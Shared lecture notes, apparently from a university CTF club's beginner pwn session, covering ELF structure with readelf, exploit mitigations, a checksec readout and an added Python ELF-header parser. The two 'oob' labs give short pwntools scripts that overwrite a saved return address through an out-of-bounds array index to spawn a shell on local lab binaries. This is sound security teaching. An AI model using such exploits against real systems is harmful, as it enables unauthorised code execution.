# NCtfU - 11/21(Pwn I r8)(Online)

###### tags: `新手場` `nctfu2023fall`

:::success
[toc]
:::

:::info
Speaker: r888800009
:::

## Start time

- 8:00 PM
- Online (Discord livestream)

## Speaker slides

[Slides](https://drive.google.com/drive/u/0/folders/1Z7UQNCkdbck4crUbsJxmszDYquGhGTxJ) (contact r8 to request access)

## Shared notes

### Lab - readelf

ELF Header

```shell!
readelf -h /bin/sh
```

Program Header

```shell!
readelf -l /bin/sh   # list segments
```

Section Header

```shell!
readelf -S /bin/sh   # list sections
```

Find which segment the `.text` section lives in

```shell!
readelf -l /bin/sh   # the section-to-segment mapping at the bottom puts .text in the second LOAD segment
```

### Lab - Mitigations

Common protection mechanisms seen in CTF

* ASLR / PIE (PIE is what lets the executable image itself be randomized by ASLR)
  * Address Space Layout Randomization
  * Position-Independent Executable => DYN file
* Stack Guard - Canary
* RelRO
  * Relocation Read-Only
* NX bit
  * No eXecute bit
  * W^X Policy
* Sandbox (Isolation)
  * Seccomp

Analysis tools

* Sanitizers
  * Address Sanitizer
  * Thread Sanitizer
  * Memory Sanitizer
  * Leak Sanitizer

Compile an ELF that is not PIE but still has canary protection

```shell!
gcc mitigations.c -lseccomp -o mitigations -no-pie
```

Run `./mitigations` four times and record where libc is loaded each time

```shell!
gdb ./mitigations
(gdb) b main
(gdb) run
(gdb) info sharedlibrary   # find the address range of the shared object
                           # /lib/x86_64-linux-gnu/libc.so.6
```

```
// first execution
From 0x00007ffff7d90700 to 0x00007ffff7f22abd
// second execution
From 0x00007ffff7d90700 to 0x00007ffff7f22abd
// third execution
From 0x00007ffff7d90700 to 0x00007ffff7f22abd
// fourth execution
From 0x00007ffff7d90700 to 0x00007ffff7f22abd
```

The range is identical every time because gdb disables address-space randomization for its debuggee by default; run `set disable-randomization off` inside gdb (or run the binary outside gdb) to observe ASLR moving libc between executions.

Checksec

```shell!
CANARY  : ENABLED
FORTIFY : disabled
NX      : ENABLED
PIE     : disabled
RELRO   : Partial
( from gdb-peda )
```

Inspect which syscalls the compiled `mitigations` binary restricts

```shell!
seccomp-tools dump ./mitigations
```

Use gdb to find the canary value

Search memory for the canary value to locate the TLS

### Lab - oob

```python!
from pwn import *

c = process("./oob")
context.log_level = 'debug'

c.recvuntil("gift")  # drop the prompt string
# the program leaks a pointer to the function 'shellcode'
shellcode = c.recvline()[1:-1]
print(shellcode)

# array[0] at [rbp - 10h]
# ( 0x10 + 8 ) / 8 = 3   -> index 3 is the saved return address
c.sendlineafter(":", str(3))
c.sendlineafter(":", shellcode)

# shell
c.interactive()
c.close()
```

### Lab - oob2

```python!
from pwn import *

c = process("./oob2")
context.log_level = 'debug'

c.recvuntil("gift")  # drop the prompt string
shellcode = c.recvline()[1:-1]
print(shellcode)

# array[0] at [rbp - 20h]
# ( 0x20 + 8 ) / 8 = 5   -> index 5 is the saved return address
c.sendlineafter(":", str(5))
c.sendlineafter(":", shellcode)

c.interactive()
c.close()
```
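The readelf lab asks which LOAD segment contains `.text`, and the Mitigations lab reads PIE/NX/RELRO off checksec. Both answers come straight from the ELF program and section headers, so the following added example (editor's code, not part of the lecture notes or the `mitigations` lab binary) parses those headers with `struct` and derives the same facts. Because it must run offline, it builds a constructed minimal ELF64 image inline instead of reading `/bin/sh`; the `pie` and `exec_stack` parameters of `build_sample_elf` are assumptions of this example that let you compare the hardened layout with an executable-stack variant.

```python
import struct

# ELF constants (values from the ELF specification).
ET_EXEC, ET_DYN = 2, 3
PT_LOAD, PT_GNU_STACK, PT_GNU_RELRO = 1, 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4
SHT_PROGBITS, SHT_STRTAB = 1, 3
SHF_ALLOC, SHF_EXECINSTR = 0x2, 0x4
EHDR_FMT = "<HHIQQQIHHHHHH"   # ELF64 header fields after the 16-byte e_ident
PHDR_FMT = "<IIQQQQQQ"        # Elf64_Phdr
SHDR_FMT = "<IIQQQQIIQQ"      # Elf64_Shdr


def parse_elf64(data):
    """Parse the ELF header, program headers and section headers (with names)."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("expected a little-endian ELF64 image")
    hdr = struct.unpack_from(EHDR_FMT, data, 16)
    e_type, e_phoff, e_shoff = hdr[0], hdr[4], hdr[5]
    e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx = hdr[8:13]
    phdrs = []
    for i in range(e_phnum):
        p = struct.unpack_from(PHDR_FMT, data, e_phoff + i * e_phentsize)
        phdrs.append(dict(type=p[0], flags=p[1], offset=p[2], vaddr=p[3], filesz=p[5], memsz=p[6]))
    raw = [struct.unpack_from(SHDR_FMT, data, e_shoff + i * e_shentsize) for i in range(e_shnum)]
    strtab = raw[e_shstrndx]                       # .shstrtab holds the section names
    names = data[strtab[4]:strtab[4] + strtab[5]]
    sections = []
    for s in raw:
        end = names.index(b"\x00", s[0])
        sections.append(dict(name=names[s[0]:end].decode(), type=s[1], flags=s[2],
                             addr=s[3], offset=s[4], size=s[5]))
    return dict(type=e_type, phdrs=phdrs, sections=sections)


def flags_str(flags):
    """Render p_flags the way 'readelf -l' does (R, W, E)."""
    return "".join(c if flags & b else "-" for c, b in (("R", PF_R), ("W", PF_W), ("E", PF_X)))


def load_segment_for_section(elf, name):
    """(1-based index among PT_LOAD segments, phdr) of the segment whose file range
    covers the named section; this is the mapping readelf -l prints at the bottom."""
    sec = next(s for s in elf["sections"] if s["name"] == name)
    loads = [p for p in elf["phdrs"] if p["type"] == PT_LOAD]
    for idx, p in enumerate(loads, start=1):
        if p["offset"] <= sec["offset"] and sec["offset"] + sec["size"] <= p["offset"] + p["filesz"]:
            return idx, p
    return None


def mitigation_summary(elf):
    """checksec-style view from headers only: no symbols are read, so the canary is
    not assessed, and RELRO is only present/absent (Full RELRO also needs BIND_NOW)."""
    stack = next((p for p in elf["phdrs"] if p["type"] == PT_GNU_STACK), None)
    return dict(
        pie=elf["type"] == ET_DYN,
        nx=stack is not None and not stack["flags"] & PF_X,   # no PT_GNU_STACK counts as executable stack
        relro_segment=any(p["type"] == PT_GNU_RELRO for p in elf["phdrs"]),
        # any LOAD segment that is both writable and executable violates W^X
        wx_segments=[flags_str(p["flags"]) for p in elf["phdrs"]
                     if p["type"] == PT_LOAD and p["flags"] & PF_W and p["flags"] & PF_X],
    )


def build_sample_elf(pie=False, exec_stack=False):
    """Constructed minimal ELF64 image (not a real program): a read-only LOAD segment
    for the headers, an R+E LOAD segment holding .text, and a PT_GNU_STACK entry."""
    text = b"\xc3" * 16                            # placeholder code bytes
    shstrtab = b"\x00.text\x00.shstrtab\x00"       # name offsets: .text=1, .shstrtab=7
    base = 0 if pie else 0x400000
    phoff, text_off, shstr_off, shoff = 64, 0x100, 0x110, 0x128
    stack_flags = PF_R | PF_W | (PF_X if exec_stack else 0)
    phdrs = b"".join([
        struct.pack(PHDR_FMT, PT_LOAD, PF_R, 0, base, base, 0x100, 0x100, 0x1000),
        struct.pack(PHDR_FMT, PT_LOAD, PF_R | PF_X, text_off, base + text_off, base + text_off,
                    len(text), len(text), 0x1000),
        struct.pack(PHDR_FMT, PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16),
    ])
    shdrs = b"".join([
        struct.pack(SHDR_FMT, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0),
        struct.pack(SHDR_FMT, 1, SHT_PROGBITS, SHF_ALLOC | SHF_EXECINSTR, base + text_off,
                    text_off, len(text), 0, 0, 16, 0),
        struct.pack(SHDR_FMT, 7, SHT_STRTAB, 0, 0, shstr_off, len(shstrtab), 0, 0, 1, 0),
    ])
    ehdr = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
    ehdr += struct.pack(EHDR_FMT, ET_DYN if pie else ET_EXEC, 0x3E, 1, base + text_off,
                        phoff, shoff, 0, 64, 56, 3, 64, 3, 2)
    img = bytearray(shoff + len(shdrs))
    img[0:64], img[phoff:phoff + len(phdrs)] = ehdr, phdrs
    img[text_off:text_off + len(text)], img[shstr_off:shstr_off + len(shstrtab)] = text, shstrtab
    img[shoff:] = shdrs
    return bytes(img)


if __name__ == "__main__":
    elf = parse_elf64(build_sample_elf())
    idx, seg = load_segment_for_section(elf, ".text")
    print(f".text is in LOAD segment #{idx}, flags {flags_str(seg['flags'])}")
    print("hardened:  ", mitigation_summary(elf))
    print("exec stack:", mitigation_summary(parse_elf64(build_sample_elf(exec_stack=True))))
```

Pointing `parse_elf64` at the bytes of a real binary (`open("/bin/sh", "rb").read()`) gives the same segment index readelf reports; on the lab's `mitigations` binary built with `-no-pie` you should see `pie=False` and `nx=True`, matching the checksec output above.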